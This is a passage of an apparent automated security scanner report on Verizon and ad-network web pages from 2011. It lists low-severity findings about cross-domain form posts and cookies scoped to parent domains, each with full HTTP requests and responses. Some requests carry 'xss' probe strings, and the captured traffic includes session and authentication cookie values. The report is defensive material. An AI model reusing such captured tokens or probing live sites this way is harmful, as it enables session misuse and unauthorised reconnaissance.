13.6. http://www.connecttoverizon.com/loginFailed.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /loginFailed.html

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

Request

GET /loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268 HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=pcwhitefencecom%3D%2526pid%253DConnectToVerizon-Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.connecttoverizon.com/objects/images/spacer.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:17 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:20:17 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Failed | C
...[SNIP]...
<div id="login-fields-return">
<FORM action="http://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post">
<div id="login-row">
...[SNIP]...

13.7. http://www.connecttoverizon.com/order-now.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /order-now.html

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:08 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:36:08 GMT
X-Powered-By: PHP/5.2.3
Connection: close
Content-Type: text/html
Content-Length: 13969

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ConnectToVerizon
...[SNIP]...
<div id="returning-users">
<form name="form1" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login"
method="post" >

<div id="username" >
...[SNIP]...

13.8. http://www.connecttoverizon.com/order-now.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /order-now.html

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:08 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:36:08 GMT
X-Powered-By: PHP/5.2.3
Connection: close
Content-Type: text/html
Content-Length: 13969

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ConnectToVerizon
...[SNIP]...
<div id="login-fields">
<form method="post" name="selfReg" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/selfRegister">
<div id="login-row-top">
...[SNIP]...

13.9. http://www.verizonwireless.com/b2c/aboutUs/affiliate/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/aboutUs/affiliate/index.jsp

Issue detail

The page contains a form which POSTs data to the domain www.connectcommerce.com. The form contains the following fields:

Request

GET /b2c/aboutUs/affiliate/index.jsp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:07 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 13457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


               <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...
<br />
   <form action="https://www.connectcommerce.com/secure/partner_app.html" method="post"><button type="submit" name="Join Program" class="redButton" title="Join Program">
...[SNIP]...

13.10. http://www.verizonwireless.com/b2c/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The page contains a form which POSTs data to the domain enterprisecenter.verizon.com. The form contains the following fields:

Request

GET /b2c/index.html?tab=business HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lan
...[SNIP]...
<div class="login_content hidden">
           <form name="vzeForm" id="vzeForm" method="post" action="https://EnterpriseCenter.verizon.com/enterprisesolutions/Default/login.fcc">
                   <div class="fixer_10">
...[SNIP]...

14. Cookie scoped to parent domain
There are 100 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


14.1. http://ak1.abmr.net/is/cache.vzw.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/cache.vzw.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/cache.vzw.com?U=/globalnav/images/nav_bg_sprite.gif&V=3-7Tbed2GP0dnaoMNvnZ2eUgT58fMyPV8GBkYhYuHX82w1oxl053n8pXaDv2S97yea&I=4979291004F3928&D=verizonwireless.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-09
Cookie: 01AI=2-2-30E5D302E7B5AE52FB3FA64F3B114F4C89F6DA2CC7589E047F8A003B02A10801-7B9575B90C2ADB1B3A50CB744273B84103B43421BA655F664BF6383B75DF7234

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif?01AD=3lAIkR3iXBmXCwxuTNimn97d865hqXBlE_6DPM4OMu5fBEs-eIi6L_A&01RI=4979291004F3928&01NA=
Expires: Mon, 05 Sep 2011 22:14:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:14:34 GMT
Connection: close
Set-Cookie: 01AI=2-2-EE1D8367D5AACB1E26AA8F0FBEBD6C10ADDCD00A522E6E0942A5B70F0B0B5323-6CB0DFCE7722E5BC43790569F97DA7EA856B7EEF1C2FB591154B5DCDB8F73D15; expires=Tue, 04-Sep-2012 22:14:34 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


14.2. http://ak1.abmr.net/is/www22.verizon.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www22.verizon.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www22.verizon.com?U=/Content/VerizonGlobalHome/images/i/welcome_txt.png&V=3-PtxfAmkJoPkxd63gt9J5IQ3XKbrkCHZUrNo4pIqf4ae5qOX%2fkQyvyg%3d%3d&I=9F535B8C084D6DA&D=verizon.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: 01AI=2-2-EC6E087E957D4D0A3545934FCB8D3C1B99B64863FCC14D306462E239165F9D1C-F808D72C3FE97181A94A7D7B4DA80EAA60A72A016141237C41FA5C587FB50FD6

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www22.verizon.com/Content/VerizonGlobalHome/images/i/welcome_txt.png?01AD=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g&01RI=9F535B8C084D6DA&01NA=
Expires: Mon, 05 Sep 2011 22:13:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close
Set-Cookie: 01AI=2-2-30E5D302E7B5AE52FB3FA64F3B114F4C89F6DA2CC7589E047F8A003B02A10801-7B9575B90C2ADB1B3A50CB744273B84103B43421BA655F664BF6383B75DF7234; expires=Tue, 04-Sep-2012 22:13:38 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


14.3. https://auth.verizon.com/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI "
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch5 (Tue Feb 27 17:18:03 2007) SunOS
Am_client_type: genericHTML
Location: https://www22.verizon.com/myverizon/?session=n&goto=null
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczpWev%2Bj7wJV5p6Vi3At4%2BjPQ6Fv%2By5Kkk%3D%40AAJTSQACNjkAAlMxAAIwNg%3D%3D%23;Domain=.verizon.com;Path=/
Set-cookie: amlbcookie=06;Domain=.verizon.com;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/


14.4. https://auth.verizon.net/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://auth.verizon.net
Path:   /amserver/UI/Login

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch 120954-05
Am_client_type: genericHTML
Location: https://www.verizon.net/ssowebapp/VOLPortalLoginnull
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczLMfAqxGV1489wz3vJJDjxw2SWemh5VQo%3D%40AAJTSQACMzAAAlMxAAIwNA%3D%3D%23;Domain=.verizon.net;Path=/
Set-cookie: amlbcookie=04;Domain=.verizon.net;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/


14.5. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:35:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; path=/
Set-Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; expires=Sat, 08-Sep-2018 22:35:47 GMT; path=/; domain=verizon.net
Set-Cookie: AkaSTrackingID=F03373E721508DB1B1034D461D039B58; path=/; domain=verizon.net

Resource /SMBPortal707d3(a)c76e008a5a1/smb could not be resolved for locale null.

14.6. http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.vzw.com
Path:   /globalnav/images/nav_bg_sprite.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /globalnav/images/nav_bg_sprite.gif?01AD=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA&01RI=4979291004F3928&01NA= HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-09
Cookie: V1Z2=CT-1

Response

HTTP/1.1 200 OK
Server: None
Content-Type: image/gif
Last-Modified: Tue, 12 Jul 2011 03:47:11 GMT
Content-Length: 1017
ETag: "3f9-4e1bc3bf"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:14:35 GMT
Connection: close
Set-Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA; expires=Mon, 03-Oct-2011 22:14:35 GMT; path=/; domain=.vzw.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a.....^...............................k............................................................................................m........t................................p..v........z........r
...[SNIP]...

14.7. http://community.adobe.com/help/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.adobe.com
Path:   /help/about.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/about.html HTTP/1.1
Host: community.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:46 GMT
Set-Cookie: ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 24306


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

...[SNIP]...

14.8. http://community.adobe.com/help/rm/sugg.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.adobe.com
Path:   /help/rm/sugg.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/rm/sugg.html HTTP/1.1
Host: community.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:46 GMT
Set-Cookie: ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/
Set-Cookie: JSESSIONID=EA8C3A95144AB975FDABE9CB1FAE425B; Path=/help
Pragma: public
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 05 Sep 2011 22:34:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: pre-check=0, post-check=0, max-age=0
Pragma: no-cache
Expires: 0
Content-Type: text/xml;charset=UTF-8
Content-Length: 204
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="utf-8"?>


<ion ver="1.0"><hl>en_US</hl><error severity="error" errorCode="MISSING_ARGUMENT" method="ach.search.sugg">One of required parameters is missing q</error></io
...[SNIP]...

14.9. http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.atomz.com
Path:   /pb00002f7b/publish/includes/css/marquee.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pb00002f7b/publish/includes/css/marquee.css HTTP/1.1
Host: content.atomz.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=c&rv=b&q=xss%20sq
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lv=1314796046155; s_vnum=1317388046156%26vn%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:13 GMT
Server: Atomz/1.0
Set-Cookie: v1stsp=A835F590A06A9B4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.atomz.com
Last-Modified: Wed, 24 Oct 2007 13:31:58 GMT
ETag: "34c02f5-76-471f494e"
Accept-Ranges: bytes
Content-Length: 118
Content-Type: text/css
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com

.blackberry {background:url(http://content.atomz.com/pb00002f7b/publish/i/lifestyle-image.jpg) no-repeat top right;}

14.10. http://d.agkn.com/pixel!t=932!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /pixel!t=932!

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel!t=932!?che=71441105&atr=124134 HTTP/1.1
Host: d.agkn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/4357?ret=html&r=77101&phint=hc3%3D%7C&phint=logInDisplay%3D1&phint=lpLanguage%3Denglish&phint=lpMarket%3Dgeneric&phint=Keywords%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_t%3DCell%20Phone%20Savings%20%26%20Discounts%20-%20Verizon%20Wireless&phint=bk_k%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_pr%3Dhttp%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html
Cookie: uuid=790101267012119588; u=6|0BEgV0fs5AAAgAAYBACQBAtGcggUAuwEAggCcAQCCAJ0BAIIAngEAggDOAQCCAgDPfQBtAAIf7ON3HooAAAAAAmz0YAAAAAAOcraKAdsBAAOtugICUH0B5QAAAAAD7CrBAAAAAAKWW1AAAAAADny33QFrAAA%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=790101267012119588; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sat, 03-Sep-2016 22:15:21 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEgV%2BAZ5AAAwAAgBACcBBVirAAUAuwEAnwDOAQCfAJwBAJ8AnQEAnwCeAQCfAQJQfQHlAAAAAAPsKsEAAAAAApZbUAAAAAAOfLfdAWsAHQ%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Wed, 04-Sep-2013 22:15:21 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"43-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: image/gif
Content-Language: en-US
Content-Length: 43
Date: Mon, 05 Sep 2011 22:15:21 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.11. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/ HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2644337228958821130

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Sat, 03-Mar-2012 22:18:33 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Sep 2011 22:18:32 GMT

GIF89a.............!.......,...........D..;

14.12. http://download.verizon.net/surround/media/misc/images/vidplayer_black_530x272.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.verizon.net
Path:   /surround/media/misc/images/vidplayer_black_530x272.jpg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /surround/media/misc/images/vidplayer_black_530x272.jpg HTTP/1.1
Host: download.verizon.net
Proxy-Connection: keep-alive
Referer: http://media.verizon.com/media/widgets/NewsCenter/flash/NewsCenterPlayer.swf?version=5&_rand=1315280536325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=03; lob=webmail; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Content-Length: 11349
Content-Type: image/jpeg
Last-Modified: Wed, 08 Sep 2010 22:58:18 GMT
Accept-Ranges: bytes
ETag: "491cd453a94fcb1:600"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:42:16 GMT
Connection: close
Set-Cookie: AkaUTrackingID=D39DBB1D9AAFA74641702E55CE620E29; expires=Sat, 08-Sep-2018 22:42:16 GMT; path=/; domain=verizon.net
